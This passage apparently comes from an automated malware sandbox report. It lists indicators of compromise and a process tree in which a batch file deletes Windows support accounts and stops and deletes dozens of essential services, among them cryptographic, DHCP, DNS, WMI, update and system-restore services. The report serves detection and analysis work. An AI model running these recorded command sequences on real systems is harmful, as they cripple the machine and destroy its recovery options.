File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-black\MedTile.scale-200.png	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\ui-strings.js	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_eu.dll	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\AdjacencyLetter.dotx	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-32.png	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_rename_18.svg	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\ui-strings.js	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk	attrib.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Mock.ps1	attrib.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\goopdate.dll	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\HeartbeatConfig.xml	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il	attrib.exe
File opened for modification	C:\Program Files\Windows Media Player\ja-JP\wmpnssui.dll.mui	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\6px.png	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Generic-Light.scale-300.png	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\ui-strings.js	attrib.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-wmpnss-service_31bf3856ad364e35_10.0.19041.746_none_e180169f2d62e633\wmpnss_color48.png	attrib.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_10.0.19041.1266_none_cfec8db821d83671_winresume.exe_85cd1215	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_vstxraid.inf.resources_31bf3856ad364e35_10.0.19041.1_it-it_6d8b992018dcb1fc\vstxraid.inf_loc	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-c..tures-deployment010_31bf3856ad364e35_10.0.19041.928_en-us_0b28d1d6de8daeff.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-shacct-profile_31bf3856ad364e35_10.0.19041.1_none_603504816df8a341.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft-windows-s..llercommandlinetool_31bf3856ad364e35_10.0.19041.1_none_34b3f2eea86afb06\sc.exe	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_windows-system-launcher.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_fcb694035fca74ef	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-audio-dmusic_31bf3856ad364e35_10.0.19041.1_none_fbe529752f0055d5\dswave.dll	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-management-oobe_31bf3856ad364e35_10.0.19041.207_none_504b6becabbef9fe.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\wow64_microsoft-windows-v..r-windows.resources_31bf3856ad364e35_10.0.19041.1_it-it_6650709d92aa8467.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft-windows-sysdm.resources_31bf3856ad364e35_10.0.19041.1_it-it_832a8a2b836c46d6\sysdm.cpl.mui	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_dual_c_mouse.inf_31bf3856ad364e35_10.0.19041.1_none_5593fa2cb7fab9f0	attrib.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft.powershel..resources.resources_31bf3856ad364e35_10.0.19041.1_de-de_99209f2d930701cb\MSFT_ArchiveResource.schema.mfl	attrib.exe
File opened for modification	C:\Windows\INF\percsas3i.inf	attrib.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-Media-Format-WOW64-merged-Package~31bf3856ad364e35~amd64~fr-FR~10.0.19041.1.cat	attrib.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-Telnet-Client-Package~31bf3856ad364e35~amd64~es-ES~10.0.19041.1.mum	attrib.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\core\js\oobe-chrome-contentview-vm.js	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-azman.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_f676dfe3c7087773.manifest	attrib.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\f18ff42b17aa9990ee61ad0c4aea9b1c\Microsoft.PowerShell.Commands.Diagnostics.ni.dll	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-rotmgr_31bf3856ad364e35_10.0.19041.746_none_0bd845a4159c1a60\r\RotMgr.dll	attrib.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-onecore-pnp-umpnpmgr.resources_31bf3856ad364e35_10.0.19041.1_es-es_1b9eaea5281dc1e4.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\FileMaps\program_files_windowspowershell_modules_pester_3.4.0_examples_validator_a8b9d4437114858b.cdf-ms	attrib.exe
File opened for modification	C:\Windows\WinSxS\x86_microsoft-windows-m..factory-handler-dll_31bf3856ad364e35_10.0.19041.746_none_ed35f4de621141b0\f	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-i..oyment-languagepack_31bf3856ad364e35_10.0.19041.1_it-it_84d064b5dfd3d68e.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\wow64_microsoft-windows-b..-configuration-data_31bf3856ad364e35_10.0.19041.546_none_eaba62c4b31f4bbe.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\wow64_microsoft-windows-infdefaultinstall_31bf3856ad364e35_10.0.19041.1_none_2cda3b956fcdb26f.manifest	attrib.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-NetFx-Shared-Misc~31bf3856ad364e35~amd64~~10.0.19041.1.cat	attrib.exe
File opened for modification	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Caching.resources\v4.0_4.0.0.0_es_b03f5f7f11d50a3a\System.Runtime.Caching.resources.dll	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.1_none_4a388618f6365227\NarratorUWPStoreLogo.scale-200.png	attrib.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft-windows-defrag-adminui_31bf3856ad364e35_10.0.19041.746_none_816403dd2374fa29\f	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\amd64_microsoft.web.administration-nonmsil_31bf3856ad364e35_10.0.19041.964_none_a652814defb84b57.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft-windows-mprmsg_31bf3856ad364e35_10.0.19041.1_none_d3d3ac2027214bbe\mprmsg.dll	attrib.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\System.Data.Entity.Design.Resources\3.5.0.0_it_b77a5c561934e089\System.Data.Entity.Design.Resources.dll	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-p..ntmanager.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_72f139a31ad7002d.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft-windows-s..gementwmi.resources_31bf3856ad364e35_10.0.19041.1_it-it_c697cdc0e6ec8fed	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-d..opactivitymoderator_31bf3856ad364e35_10.0.19041.1052_none_7ec56a9d21671e02\f\dam.sys	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-webp-image-codec_31bf3856ad364e35_10.0.19041.746_none_e7f3ec23cf10ef76	attrib.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\System.ServiceModel.Resources\3.0.0.0_de_b77a5c561934e089	attrib.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-PeerDist-Client-Group-Package~31bf3856ad364e35~amd64~ja-JP~10.0.19041.1.mum	attrib.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\GamingTcuiHelpers.dll	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-printing-powershell_31bf3856ad364e35_10.0.19041.1_none_023f1303126663c4\MSFT_PrinterConfiguration.types.ps1xml	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..extension.resources_31bf3856ad364e35_10.0.19041.1_en-us_9673137f5f13c11c\wshext.dll.mui	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-t..ty-client.resources_31bf3856ad364e35_10.0.19041.1_es-es_f612288748293d4a\mstask.dll.mui	attrib.exe
File opened for modification	C:\Windows\WinSxS\Catalogs\ea128310259905fc63ec2679811827a2d4a5a200e27baf0e20d670eed496290e.cat	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-htmlhelp_31bf3856ad364e35_10.0.19041.1_none_7e470436241a018f.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\amd64_multimedia-mfcore-w..oyment-languagepack_31bf3856ad364e35_10.0.19041.1_es-es_7424f0a9a5731791.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-b..bitsadmin.resources_31bf3856ad364e35_10.0.19041.1_de-de_84c5fe4216b88857	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-zipfldr.resources_31bf3856ad364e35_10.0.19041.1_es-es_c93423de1dd0cb1a\zipfldr.dll.mui	attrib.exe
File opened for modification	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\caspol.resources	attrib.exe
File opened for modification	C:\Windows\WinSxS\x86_netfx-aspnet_webadmin_wizard_res_b03f5f7f11d50a3a_10.0.19041.1_none_666b233e73c584c3\wizard.aspx.resx	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-onecore-tetheringservice_31bf3856ad364e35_10.0.19041.746_none_6ba9668b45cb4938\tetheringconfigsp.dll	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-efs-rekeywiz.resources_31bf3856ad364e35_10.0.19041.1_it-it_fbf03556a3e6914e\rekeywiz.exe.mui	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-xbox-gameoverlay_31bf3856ad364e35_10.0.19041.1052_none_b39097e5dc722fb4\r\GamePanel.exe	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-storagemanagementwmi_31bf3856ad364e35_10.0.19041.1_none_06dd1134e9ef125a.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\msil_microsoft.web.manag..iisclient.resources_31bf3856ad364e35_10.0.19041.1_it-it_30d4b6f36a07608e	attrib.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft.appv.appv..mconsumer.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_e677d8267654d7e5	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-hello-face_31bf3856ad364e35_10.0.19041.1202_none_760cf382e7e2de61\r\FaceTrackerInternal.dll	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-diskmanagement_31bf3856ad364e35_10.0.19041.1_none_b788c33b0f1ac5db\dmutil.dll	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_it-it_f8576122041e54e0\Report.System.Common.xml	attrib.exe
File opened for modification	C:\Windows\WinSxS\FileMaps\$$_system32_windowspowershell_v1.0_modules_networkswitchmanager_de-de_00bba70f50cf3530.cdf-ms	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-data-activities_31bf3856ad364e35_10.0.19041.746_none_3f40bf6b7136aaf1\Windows.Data.Activities.dll	attrib.exe
File opened for modification	C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-c..wow64-deployment020_31bf3856ad364e35_10.0.19041.1266_none_d18e2a5f93d3c76c.manifest	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-3daudio-hrtfapo_31bf3856ad364e35_10.0.19041.84_none_8470948f7dae59d6	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-diskmanagement_31bf3856ad364e35_10.0.19041.1_none_b788c33b0f1ac5db\dmintf.dll	attrib.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5072	sc.exe
3760	sc.exe
1992	sc.exe
2056	sc.exe
3260	sc.exe
232	sc.exe
1756	sc.exe
4060	sc.exe
2164	sc.exe
1468	sc.exe
2192	sc.exe
3924	sc.exe
4456	sc.exe
4172	sc.exe
4052	sc.exe
3900	sc.exe
4572	sc.exe
452	sc.exe
3048	sc.exe
4868	sc.exe
3648	sc.exe
2952	sc.exe
1908	sc.exe
4868	sc.exe
4680	sc.exe
1256	sc.exe
2072	sc.exe
3508	sc.exe
5072	sc.exe
2872	sc.exe
3816	sc.exe
3964	sc.exe
3508	sc.exe
2060	sc.exe
5056	sc.exe
5008	sc.exe
4136	sc.exe
4268	sc.exe
3028	sc.exe
2936	sc.exe
1104	sc.exe
932	sc.exe
5036	sc.exe
1756	sc.exe
1736	sc.exe
2384	sc.exe
848	sc.exe
4032	sc.exe
4456	sc.exe
2280	sc.exe
1616	sc.exe
2424	sc.exe
3208	sc.exe
2900	sc.exe
3484	sc.exe
2012	sc.exe
2520	sc.exe
5100	sc.exe
2804	sc.exe
4268	sc.exe
2544	sc.exe
1072	sc.exe
3908	sc.exe
792	sc.exe

Runs net.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3564 wrote to memory of 2524	3564	cmd.exe	87
PID 3564 wrote to memory of 2524	3564	cmd.exe	87
PID 2524 wrote to memory of 1092	2524	net.exe	88
PID 2524 wrote to memory of 1092	2524	net.exe	88
PID 3564 wrote to memory of 2564	3564	cmd.exe	89
PID 3564 wrote to memory of 2564	3564	cmd.exe	89
PID 2564 wrote to memory of 2132	2564	net.exe	90
PID 2564 wrote to memory of 2132	2564	net.exe	90
PID 3564 wrote to memory of 1840	3564	cmd.exe	91
PID 3564 wrote to memory of 1840	3564	cmd.exe	91
PID 3564 wrote to memory of 1340	3564	cmd.exe	92
PID 3564 wrote to memory of 1340	3564	cmd.exe	92
PID 3564 wrote to memory of 3760	3564	cmd.exe	93
PID 3564 wrote to memory of 3760	3564	cmd.exe	93
PID 3564 wrote to memory of 1316	3564	cmd.exe	94
PID 3564 wrote to memory of 1316	3564	cmd.exe	94
PID 3564 wrote to memory of 2240	3564	cmd.exe	96
PID 3564 wrote to memory of 2240	3564	cmd.exe	96
PID 3564 wrote to memory of 1848	3564	cmd.exe	95
PID 3564 wrote to memory of 1848	3564	cmd.exe	95
PID 3564 wrote to memory of 712	3564	cmd.exe	97
PID 3564 wrote to memory of 712	3564	cmd.exe	97
PID 3564 wrote to memory of 2520	3564	cmd.exe	99
PID 3564 wrote to memory of 2520	3564	cmd.exe	99
PID 3564 wrote to memory of 2716	3564	cmd.exe	98
PID 3564 wrote to memory of 2716	3564	cmd.exe	98
PID 3564 wrote to memory of 336	3564	cmd.exe	100
PID 3564 wrote to memory of 336	3564	cmd.exe	100
PID 3564 wrote to memory of 4052	3564	cmd.exe	101
PID 3564 wrote to memory of 4052	3564	cmd.exe	101
PID 3564 wrote to memory of 4572	3564	cmd.exe	102
PID 3564 wrote to memory of 4572	3564	cmd.exe	102
PID 3564 wrote to memory of 2872	3564	cmd.exe	103
PID 3564 wrote to memory of 2872	3564	cmd.exe	103
PID 3564 wrote to memory of 1156	3564	cmd.exe	104
PID 3564 wrote to memory of 1156	3564	cmd.exe	104
PID 3564 wrote to memory of 2688	3564	cmd.exe	105
PID 3564 wrote to memory of 2688	3564	cmd.exe	105
PID 3564 wrote to memory of 864	3564	cmd.exe	106
PID 3564 wrote to memory of 864	3564	cmd.exe	106
PID 3564 wrote to memory of 2452	3564	cmd.exe	107
PID 3564 wrote to memory of 2452	3564	cmd.exe	107
PID 3564 wrote to memory of 1532	3564	cmd.exe	108
PID 3564 wrote to memory of 1532	3564	cmd.exe	108
PID 3564 wrote to memory of 3704	3564	cmd.exe	109
PID 3564 wrote to memory of 3704	3564	cmd.exe	109
PID 3564 wrote to memory of 3332	3564	cmd.exe	110
PID 3564 wrote to memory of 3332	3564	cmd.exe	110
PID 3564 wrote to memory of 1104	3564	cmd.exe	111
PID 3564 wrote to memory of 1104	3564	cmd.exe	111
PID 3564 wrote to memory of 2056	3564	cmd.exe	112
PID 3564 wrote to memory of 2056	3564	cmd.exe	112
PID 3564 wrote to memory of 4716	3564	cmd.exe	113
PID 3564 wrote to memory of 4716	3564	cmd.exe	113
PID 3564 wrote to memory of 932	3564	cmd.exe	114
PID 3564 wrote to memory of 932	3564	cmd.exe	114
PID 3564 wrote to memory of 468	3564	cmd.exe	115
PID 3564 wrote to memory of 468	3564	cmd.exe	115
PID 3564 wrote to memory of 5080	3564	cmd.exe	116
PID 3564 wrote to memory of 5080	3564	cmd.exe	116
PID 3564 wrote to memory of 2252	3564	cmd.exe	117
PID 3564 wrote to memory of 2252	3564	cmd.exe	117
PID 3564 wrote to memory of 400	3564	cmd.exe	118
PID 3564 wrote to memory of 400	3564	cmd.exe	118

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1348	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3564
- C:\Windows\system32\net.exe
  net user HelpAssistant /delete
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user HelpAssistant /delete
    3⤵
    PID:1092
- C:\Windows\system32\net.exe
  net user SUPPORT_388945a0 /delete
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user SUPPORT_388945a0 /delete
    3⤵
    PID:2132
- C:\Windows\system32\sc.exe
  sc stop beep
  2⤵
  PID:1840
- C:\Windows\system32\sc.exe
  sc delete beep
  2⤵
  PID:1340
- C:\Windows\system32\sc.exe
  sc stop browser
  2⤵
  PID:3760
- C:\Windows\system32\sc.exe
  sc delete browser
  2⤵
  PID:1316
- C:\Windows\system32\sc.exe
  sc delete cryptsvc
  2⤵
  PID:1848
- C:\Windows\system32\sc.exe
  sc stop cryptsvc
  2⤵
  PID:2240
- C:\Windows\system32\sc.exe
  sc stop dhcp
  2⤵
  PID:712
- C:\Windows\system32\sc.exe
  sc stop dmboot
  2⤵
  PID:2716
- C:\Windows\system32\sc.exe
  sc delete dhcp
  2⤵
  PID:2520
- C:\Windows\system32\sc.exe
  sc delete dmboot
  2⤵
  PID:336
- C:\Windows\system32\sc.exe
  sc stop dmserver
  2⤵
  - Launches sc.exe
  PID:4052
- C:\Windows\system32\sc.exe
  sc delete dmserver
  2⤵
  PID:4572
- C:\Windows\system32\sc.exe
  sc stop dnscache
  2⤵
  PID:2872
- C:\Windows\system32\sc.exe
  sc delete dnscache
  2⤵
  PID:1156
- C:\Windows\system32\sc.exe
  sc stop fastfat
  2⤵
  PID:2688
- C:\Windows\system32\sc.exe
  sc delete fastfat
  2⤵
  PID:864
- C:\Windows\system32\sc.exe
  sc stop fastuserswitchingcompatibility
  2⤵
  PID:2452
- C:\Windows\system32\sc.exe
  sc delete fastuserswitchingcompatibility
  2⤵
  PID:1532
- C:\Windows\system32\sc.exe
  sc stop helpsvc
  2⤵
  PID:3704
- C:\Windows\system32\sc.exe
  sc delete helpsvc
  2⤵
  PID:3332
- C:\Windows\system32\sc.exe
  sc stop lanmanserver
  2⤵
  - Launches sc.exe
  PID:1104
- C:\Windows\system32\sc.exe
  sc delete lanmanserver
  2⤵
  - Launches sc.exe
  PID:2056
- C:\Windows\system32\sc.exe
  sc stop lmhosts
  2⤵
  PID:4716
- C:\Windows\system32\sc.exe
  sc delete lmhosts
  2⤵
  - Launches sc.exe
  PID:932
- C:\Windows\system32\sc.exe
  sc stop messenger
  2⤵
  PID:468
- C:\Windows\system32\sc.exe
  sc delete messenger
  2⤵
  PID:5080
- C:\Windows\system32\sc.exe
  sc stop msfs
  2⤵
  PID:2252
- C:\Windows\system32\sc.exe
  sc delete msfs
  2⤵
  PID:400
- C:\Windows\system32\sc.exe
  sc stop ndproxy
  2⤵
  - Launches sc.exe
  PID:1908
- C:\Windows\system32\sc.exe
  sc delete ndproxy
  2⤵
  PID:2704
- C:\Windows\system32\sc.exe
  sc stop netman
  2⤵
  PID:4444
- C:\Windows\system32\sc.exe
  sc delete netman
  2⤵
  PID:3948
- C:\Windows\system32\sc.exe
  sc stop nla
  2⤵
  - Launches sc.exe
  PID:2164
- C:\Windows\system32\sc.exe
  sc delete nla
  2⤵
  PID:1016
- C:\Windows\system32\sc.exe
  sc stop null
  2⤵
  PID:3764
- C:\Windows\system32\sc.exe
  sc delete null
  2⤵
  PID:3528
- C:\Windows\system32\sc.exe
  sc stop parvdm
  2⤵
  PID:4564
- C:\Windows\system32\sc.exe
  sc delete parvdm
  2⤵
  PID:4184
- C:\Windows\system32\sc.exe
  sc stop protectedstorage
  2⤵
  PID:4164
- C:\Windows\system32\sc.exe
  sc delete protectedstorage
  2⤵
  PID:4984
- C:\Windows\system32\sc.exe
  sc stop rasacd
  2⤵
  PID:2780
- C:\Windows\system32\sc.exe
  sc delete rasacd
  2⤵
  PID:2532
- C:\Windows\system32\sc.exe
  sc stop rasauto
  2⤵
  PID:496
- C:\Windows\system32\sc.exe
  sc delete rasauto
  2⤵
  PID:448
- C:\Windows\system32\sc.exe
  sc stop rasman
  2⤵
  PID:4132
- C:\Windows\system32\sc.exe
  sc delete rasman
  2⤵
  PID:768
- C:\Windows\system32\sc.exe
  sc stop remoteregistry
  2⤵
  PID:4916
- C:\Windows\system32\sc.exe
  sc delete remoteregistry
  2⤵
  PID:4528
- C:\Windows\system32\sc.exe
  sc stop schedule
  2⤵
  PID:4824
- C:\Windows\system32\sc.exe
  sc delete schedule
  2⤵
  PID:1668
- C:\Windows\system32\sc.exe
  sc stop seclogon
  2⤵
  PID:4300
- C:\Windows\system32\sc.exe
  sc delete seclogon
  2⤵
  PID:4960
- C:\Windows\system32\sc.exe
  sc stop sens
  2⤵
  PID:2384
- C:\Windows\system32\sc.exe
  sc delete sens
  2⤵
  PID:4320
- C:\Windows\system32\sc.exe
  sc stop shellhwdetection
  2⤵
  - Launches sc.exe
  PID:1468
- C:\Windows\system32\sc.exe
  sc delete shellhwdetection
  2⤵
  - Launches sc.exe
  PID:3260
- C:\Windows\system32\sc.exe
  sc stop spooler
  2⤵
  PID:4304
- C:\Windows\system32\sc.exe
  sc delete spooler
  2⤵
  PID:964
- C:\Windows\system32\sc.exe
  sc stop sr
  2⤵
  PID:1700
- C:\Windows\system32\sc.exe
  sc delete sr
  2⤵
  PID:1632
- C:\Windows\system32\sc.exe
  sc stop srservice
  2⤵
  PID:3316
- C:\Windows\system32\sc.exe
  sc delete srservice
  2⤵
  PID:1460
- C:\Windows\system32\sc.exe
  sc stop srv
  2⤵
  PID:4568
- C:\Windows\system32\sc.exe
  sc delete srv
  2⤵
  - Launches sc.exe
  PID:5072
- C:\Windows\system32\sc.exe
  sc stop ssdpsrv
  2⤵
  PID:2052
- C:\Windows\system32\sc.exe
  sc delete ssdpsrv
  2⤵
  - Launches sc.exe
  PID:4868
- C:\Windows\system32\sc.exe
  sc stop tapisrv
  2⤵
  PID:4092
- C:\Windows\system32\sc.exe
  sc delete tapisrv
  2⤵
  PID:4256
- C:\Windows\system32\sc.exe
  sc stop themes
  2⤵
  PID:3192
- C:\Windows\system32\sc.exe
  sc delete themes
  2⤵
  PID:4060
- C:\Windows\system32\sc.exe
  sc stop trkwks
  2⤵
  - Launches sc.exe
  PID:2544
- C:\Windows\system32\sc.exe
  sc delete trkwks
  2⤵
  - Launches sc.exe
  PID:3484
- C:\Windows\system32\sc.exe
  sc stop uploadmgr
  2⤵
  PID:792
- C:\Windows\system32\sc.exe
  sc delete uploadmgr
  2⤵
  PID:5104
- C:\Windows\system32\sc.exe
  sc stop w32time
  2⤵
  - Launches sc.exe
  PID:4572
- C:\Windows\system32\sc.exe
  sc delete w32time
  2⤵
  PID:2468
- C:\Windows\system32\sc.exe
  sc stop wanarp
  2⤵
  PID:4552
- C:\Windows\system32\sc.exe
  sc delete wanarp
  2⤵
  PID:1244
- C:\Windows\system32\sc.exe
  sc stop webclient
  2⤵
  PID:3816
- C:\Windows\system32\sc.exe
  sc delete webclient
  2⤵
  - Launches sc.exe
  PID:1756
- C:\Windows\system32\sc.exe
  sc stop winmgmt
  2⤵
  PID:1532
- C:\Windows\system32\sc.exe
  sc delete winmgmt
  2⤵
  - Launches sc.exe
  PID:3508
- C:\Windows\system32\sc.exe
  sc stop wmdmpmsp
  2⤵
  PID:2940
- C:\Windows\system32\sc.exe
  sc delete wmdmpmsp
  2⤵
  PID:3220
- C:\Windows\system32\sc.exe
  sc stop wuauserv
  2⤵
  PID:892
- C:\Windows\system32\sc.exe
  sc delete wuauserv
  2⤵
  PID:2896
- C:\Windows\system32\sc.exe
  sc stop wzcsvc
  2⤵
  PID:5052
- C:\Windows\system32\sc.exe
  sc delete wzcsvc
  2⤵
  PID:2308
- C:\Windows\system32\sc.exe
  sc stop Abiosdsk
  2⤵
  PID:1240
- C:\Windows\system32\sc.exe
  sc delete Abiosdsk
  2⤵
  PID:5076
- C:\Windows\system32\sc.exe
  sc stop abp480n5
  2⤵
  PID:2252
- C:\Windows\system32\sc.exe
  sc delete abp480n5
  2⤵
  - Launches sc.exe
  PID:2060
- C:\Windows\system32\sc.exe
  sc stop ACPIEC
  2⤵
  - Launches sc.exe
  PID:452
- C:\Windows\system32\sc.exe
  sc delete ACPIEC
  2⤵
  PID:2784
- C:\Windows\system32\sc.exe
  sc stop adpu160m
  2⤵
  PID:1720
- C:\Windows\system32\sc.exe
  sc delete adpu160m
  2⤵
  PID:3948
- C:\Windows\system32\sc.exe
  sc stop Aha154x
  2⤵
  PID:2164
- C:\Windows\system32\sc.exe
  sc delete Aha154x
  2⤵
  - Launches sc.exe
  PID:1736
- C:\Windows\system32\sc.exe
  sc stop aic78u2
  2⤵
  PID:4660
- C:\Windows\system32\sc.exe
  sc delete aic78u2
  2⤵
  - Launches sc.exe
  PID:3900
- C:\Windows\system32\sc.exe
  sc stop aic78xx
  2⤵
  PID:852
- C:\Windows\system32\sc.exe
  sc delete aic78xx
  2⤵
  PID:4700
- C:\Windows\system32\sc.exe
  sc stop Alerter
  2⤵
  PID:2780
- C:\Windows\system32\sc.exe
  sc delete Alerter
  2⤵
  PID:2532
- C:\Windows\system32\sc.exe
  sc stop ALG
  2⤵
  - Launches sc.exe
  PID:5008
- C:\Windows\system32\sc.exe
  sc delete ALG
  2⤵
  PID:1836
- C:\Windows\system32\sc.exe
  sc stop AliIde
  2⤵
  PID:5116
- C:\Windows\system32\sc.exe
  sc delete AliIde
  2⤵
  PID:1496
- C:\Windows\system32\sc.exe
  sc stop amsint
  2⤵
  PID:900
- C:\Windows\system32\sc.exe
  sc delete amsint
  2⤵
  - Launches sc.exe
  PID:2192
- C:\Windows\system32\sc.exe
  sc stop AppMgmt
  2⤵
  PID:5032
- C:\Windows\system32\sc.exe
  sc delete AppMgmt
  2⤵
  PID:1668
- C:\Windows\system32\sc.exe
  sc stop asc
  2⤵
  PID:1692
- C:\Windows\system32\sc.exe
  sc delete asc
  2⤵
  PID:4440
- C:\Windows\system32\sc.exe
  sc stop asc3350p
  2⤵
  PID:2384
- C:\Windows\system32\sc.exe
  sc delete asc3350p
  2⤵
  PID:1564
- C:\Windows\system32\sc.exe
  sc stop asc3550
  2⤵
  PID:4468
- C:\Windows\system32\sc.exe
  sc delete asc3550
  2⤵
  PID:1468
- C:\Windows\system32\sc.exe
  sc stop AsyncMac
  2⤵
  PID:1320
- C:\Windows\system32\sc.exe
  sc delete AsyncMac
  2⤵
  - Launches sc.exe
  PID:2072
- C:\Windows\system32\sc.exe
  sc stop Atdisk
  2⤵
  PID:1768
